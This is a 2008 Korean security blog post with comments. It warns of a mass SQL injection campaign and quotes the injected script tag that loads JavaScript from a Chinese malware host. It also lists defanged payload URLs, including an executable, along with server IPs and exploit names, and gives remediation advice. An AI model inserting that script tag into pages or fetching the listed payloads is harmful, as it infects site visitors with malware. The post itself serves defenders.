헐랭이와 IT보안 (opt9's IT Security)

swbae.egloos.com

애드센스4


대량 SQL 삽입 공격 패턴 바뀌어 보안 정보

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.

중국애들이 악성코드 호스팅 서버와 자바스크립트의 이름을 다시 바꾸었습니다.

<script src=hxxp://bbs.jueduizuan.com/ip.js> 로 바꾸었군요.

구글에서 뒤져보면 전세계적으로 1,610 개 정도가 검색됩니다.

그 중에는 한국 사이트도 3개 있군요.


위의 사이트 관리자 분들은 DB 내에 삽입된 <script src=hxxp://bbs.jueduizuan.com/ip.js></script> 를 삭제하시고, SQL injection 취약점에 재차 당하지 않도록 웹 사이트 소스를 수정하시는게 좋겠습니다.

bbs.jueduizuan.com/ip.js 는 index.htm 을 재호출하는데, index.htm 이 아주 악성코드 밭이군요.
hxxp://bbs.jueduizuan.com 서버에 심어둔 exploit 만 아니라 hxxp://js.users.51.la/, hxxp://www.51.la, hxxp://img.users.51.la 까지 차례로 호출하면서 악성코드 다운로드를 시도합니다.

KISA 와 ISP 가 공조하여 bbs.jueduizuan.com, *.51.la, winzipices.cn, bluell.cn 도메인에 대해 차단하는 조치가 필요할 듯 합니다. 아직 초기 단계이고 국내 사이트의 피해가 적으므로 초기 진화가 가능할 듯...

참고 :
winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js, winzipices.cn/5.js 에도 주의
특히 hxxp://www.bluell.cn/ri.exe 에 주의


# 주의사항 : 위의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.

---- 추가 ----
구글링해보니 bluell.cn 에서 호스팅되는 악성코드 종류가 정말 다양하군요..
또다른 대량 악성코드 호스팅 서버 : hxxp://a.tnbdj.cn/cc/p60.htm <-- 얘는 /cc/ 아래에 pxx.htm, pxxx.htm 형태로 다양한 악성코드를 서비스하고 있다.

winzipices.cn   [60.191.239.229] (JINHUA TELECOM, Jinhua, CN)
www.bluell.cn   [60.191.239.219] (JINHUA TELECOM, Jinhua, CN)
bbs.jueduizuan.com [60.191.239.219] (JINHUA TELECOM, Jinhua, CN)
a.tnbdj.cn      [60.190.118.246] (WENZHOU TELECOM, Wenzhou, CN)
51la.ajiang.net [222.88.95.2] (CHINANET HENAN Province, Henan, CN)

중국 동부와 남부에서 호스팅되고 있는 것으로 보인다.


이글루스 가든 - professional secur...
태그 : , , ,

포스트 메타 정보

자동 검색 관련글

퍼블리싱 및 추천

같은 카테고리의 글

트랙백(3)핑백(1) 덧글(11)

트랙백

이 글과 관련된 글 쓰기 (트랙백 보내기)
TrackbackURL : http://swbae.egloos.com/tb/1752455 [도움말]

  • 대량 SQL Injection 공격 시 사용되는 악성코드 2008/05/07 23:29 #

    대량 SQL 삽입 공격 패턴 바뀌어혈렁이 형의 블로그에서 대량 SQL 삽입 공격 패턴이 바뀌었다는 글을 보고 관련 악성코드를 전부 받아보았다.공격의 패턴이 바뀐게 아니라 악성코드의 유형이 바뀌었다고 해야할까??아니면, 공격 패턴도 함께 바뀌었을까??공격 로그를 확보하신 분은 제보 바랍니다. ㅎㅎ아무튼 이넘들 상당히 귀챦게 하네. ㅡㅡ;그런데, 문제는 백신에서도 아직 제대로 잡는 것 같지는 않다. 본인의 알약에서도 아래와 같이 한넘(real.ht...... more

  • hxxp://winzipices.cn/.js와 hxxp://bbs.jueduizuan.com/ip.js 2008/05/08 00:29 #

    방문자수가 갑자기 늘어났다. 뭔가 이상하다. 그래서 http://isc.sans.org/를 방문했다. 역시나... 이 글 적고 다시 외국사이트를 방문하던 중... 새로운 정보가 업로드 된것을 확인 했다. ShadowServer 요 사이트다. 글 적고 다시 인터넷 검색하다가 헐랭이님께서 먼저 작성하신 글을 보았다. 글 적고 검색하다보면 자꾸 새로운 사이트와 정보가 나온다. 1. hxxp://winzipices.cn/2.js보고는 5월 4일에 작성...... more

  • SANS 다수의 SQL Injection Code 보고 2008/05/08 09:32 #

    SANS ISC 에서 다수의 SQL Injection 공격으로 인한 Exploit Script Code 삽입 피해를 보고했다. http://isc.sans.org/diary.html?storyid=4393 하지만 해당 공격이 포착된 시점은 이미 좀 전이고, 악성코드를 링크한 일부 사이트 등도 기존에 사용되었던 곳 중 하나이다. ISC 에서 보고한 것을 다시 정리하면 아래와 같고 현재 일부는 차단이 된 상태이다. hxxp://winzipices....... more

핑백

덧글

  • 마조리카 2008/05/07 22:54 # 삭제 답글

    혹시나해서 받아서 v3로만 검새해봤는데 실행파일을 못찾는 것 봐서는.. 새로운 녀석이거나 변종이려나요?

  • 헐랭이 2008/05/07 23:31 # 답글

    마조리카// 감염의 우려가 있으니 신속히 다른 백신으로 검사해보시기 바랍니다. 해당 사이트에 접속후 생성되는 파일들을 전부 탐지하는 백신은 아직 없습니다.

    해당 사이트의 악성 코드는 대충
    MS07-004 VML integer overflow exploit
    RealPlayer exploit
    JS/Downloader
    Troj/Mdrop-BSF
    등이 있으며, VirusTotal 의 결과를 보니 아직 전부 탐지해내는 백신이 없습니다.

    AVG 와 F-Prot, Kaspersky 의 3 개 제품을 전부 동원해야 잡아낼 수 있으니 참고하세요.

  • 마조리카 2008/05/07 23:33 # 삭제 답글

    아.. 실행한게 아니구요 파일만 구해서 백신 돌려보았어요... @_@

  • 마조리카 2008/05/07 23:38 # 삭제 답글

    ri.exe는 > http://www.virustotal.com/analisis/1521a2aca3993a0a8dd461871da7dff1 이거네요.

  • 헐랭이 2008/05/07 23:42 # 답글

    pcaccent 님이 저보다 간결하게 잘 정리하셨네요.
    http://pcaccent.oranc.co.kr/tt/1080
    꼭 한번 읽어보세요.

  • 헐랭이 2008/05/08 00:18 # 답글

    14.htm 에 간단한 암호화를 적용한 사례 발견~

  • coderant 2008/05/08 00:46 # 답글

    이 참에 우리 해킹 전문가 포럼같은 거를 한번 구성해보면 어떨지 전문가 집단으로 국내 보안 환경 개선을 위해서 뭔가를 이바지해봄이 어떨까 합니다.

  • 헐랭이 2008/05/08 01:22 # 답글

    좋은 생각이네요.

  • 미니어스 2008/05/09 00:33 # 삭제 답글

    형님은 항상 빠르시네요.

    저도 ip.js 징후 포착해서 해당 내용 검색하니 형 블로그가 나오네요..

    요즘 웹 악성 코드쪽으로 집중적으로 파시는거 같아요 :)

  • 2008/05/10 09:39 # 답글 비공개

    비공개 덧글입니다.

  • 헐랭이 2008/05/10 14:20 # 답글

    익명님// http://swbae.egloos.com/1747128 에 나오는 조치 시 주의사항에 따라 조치하시면 됩니다. 웹 로그를 살펴보면 대충 문제의 원인이 되는 소스를 찾을 수 있습니다. 해당 소스들을 수정하시는게 가장 편하고 빠르게 대처할 수 있는 방법입니다. 소스를 수정할 여건이 안된다면, WebKnight 등의 웹 방화벽을 적용하시는 것도 방법이 되겠지요. 속도저하를 감수해야겠지만...
댓글 입력 영역

검색

블로그내 검색 영역

애드센스7

News

Exploits

트위터

드림위즈

Dataloss DB

swbae.egloos.com is powered by Egloos. Subscribe to RSS Skin design by 헐랭이.